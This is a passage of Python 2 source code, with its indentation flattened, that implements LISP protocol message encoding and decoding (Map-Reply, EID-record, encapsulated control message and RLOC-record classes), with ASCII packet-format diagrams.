if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
